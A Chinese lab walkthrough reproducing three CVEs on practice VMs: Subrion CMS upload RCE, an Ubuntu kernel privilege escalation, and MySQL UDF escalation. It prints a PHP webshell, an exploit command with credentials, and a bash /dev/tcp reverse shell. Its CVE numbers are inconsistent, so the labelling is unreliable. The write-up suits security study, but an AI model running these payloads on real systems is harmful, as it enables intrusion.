分享几个CVE漏洞复现，从零基础到精通，收藏这篇就够了！

企业开发 2025-04-08 09:14:24 阅读次数: 0

漏洞复现，就像拆盲盒，永远不知道下一个惊喜（或者惊吓）是什么！今天，就带大家一起“开箱”几个我遇到的CVE漏洞，保证让你看完直呼内行！

数据库加解密？DecryptTools 一键搞定！

代码审计还在愁？铲子 SATST 帮你忙！

一、CVE-2018-29422：文件上传变“炸弹”，RCE漏洞激情复现

目标：venom靶机

首先，给咱们的 venom.box 安排个域名解析，让它有个家：

然后，冲着它就是一顿猛点：

嚯！一个登录界面，还贴心地告诉你系统版本是 Subrion CMS v4.2.1，这不就等于在说“快来搞我”吗？

image-20250312153555716

赶紧查查老底，果然发现一个文件上传RCE漏洞，简直是天赐良机！

image-20250312153755215

撸起袖子就是干！

参考文章：https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE

直接梭哈：sudo python3 49876.py -u http://venom.box/panel/ -l dora -p E7r9t8@Q#h%Hy+M1234

Shell是拿到了，但是想切换成交互模式？没门！

换个姿势！用维吉尼亚解密后的密码，登录管理面板：

成功上位！管理员权限到手！赶紧去设置里溜达一圈：

既然有文件上传RCE漏洞，那必须得找个上传点啊！

Bingo！就是这儿了！

image-20250312155354469

点它！

image-20250312155446078

先传个txt文件试试水，嗯，成功了！

image-20250312155542068

来个狠的，php文件！Duang~ 被过滤了！看来没那么容易。

track <?php system($_GET["a"]); ?>

不过没关系，路径已经暴露：

image-20250312155917497

漏洞利用代码里提示要用pht或phar后缀，安排！

exp文章：https://github.com/intelliants/subrion/issues/801

image-20250312165130284

去这个网站生成反弹shell：https://www.ddosi.org/shell/

新建一个.pht文件，把反弹shell代码塞进去，上传！访问这个路径：

攻击机开启监听，Boom！反弹成功！

image-20250312170506847

二、CVE-2021-3493：Ubuntu低版本内核提权，菜鸟也能变大佬！

目标：venom靶机

老规矩，先搜历史漏洞：

image-20250312170937361

看看这漏洞长啥样：

image-20250312171341391

使用方法也贴心地给你准备好了：

image-20250312171249834

开启web服务，在靶机上下载脚本：

image-20250312171518442

结果...执行失败！权限也给了，还是不行！

image-20250312172158480

不怕！换个exp！

exp文章：https://github.com/briskets/CVE-2021-3493

下载到kali：

image-20250312172439048

继续开启web服务，用 wget 命令下载到靶机，赋予权限，编译，然后执行！

成了！提权成功！进 **/root 目录，flag到手！

image-20250312172519193

三、CVE-2016-6662：UDF提权，让你的MySQL变成“私人订制”！

先看看版本是64位还是32位，这决定你使用的udf文件带64还是不带64

目标：sundown靶机

是64位！再看看 secure_file_priv 是否为空，这决定了MySQL会不会对导入导出做限制：

show global variables like 'secure%';

没有回显？淡定！

具体信息来了：

secure_file_priv 的值为 NULL ，表示不允许导入导出，GG
secure_file_priv 的值为 /tmp/ ，表示只能在 /tmp/ 玩，没意思
secure_file_priv 的值为空，表示随便你搞，冲！

再看看MySQL版本，>=5.1 的话，上传 udf 要放在 mysqllibplugin 目录里，用 show variables like "%plugin%" 看看（没有就自己建一个）。

路径也给你找好了：

show variables like '%plugin%'; 路径：/usr/lib/x86_64-linux-gnu/mariadb19/plugin/

一切就绪，开始提权！去kali的 /usr/share/metasploit-framework/data/exploits/mysql 目录，把 64位的udf 文件拷到本地（windows用.dll，linux用.so，别搞错了！）。

开启web服务，传文件！

上传成功！

回到靶机，进 **/tmp 目录：

回到数据库，看看mysql数据库下的数据表信息：

开始骚操作：

create table shell(line blob); # 需要为blob，因为是二进制对象存储容器，存储下面load_file的返回值 insert into shell values(load_file('/tmp/lib_mysqludf_sys_64.so')); # 插入并存储load_file的返回值

写入文件，创建函数，反弹shell！(bash一定要加-c参数，不然会报错！)

select * from shell into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so'; # 将/tmp/udf文件写入到plugin里 create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; # 创建函数于udf文件中加载 select sys_exec('bash -c "bash -i >& /dev/tcp/192.168.108.130/4444 0>&1"'); # 调用函数执行反弹shell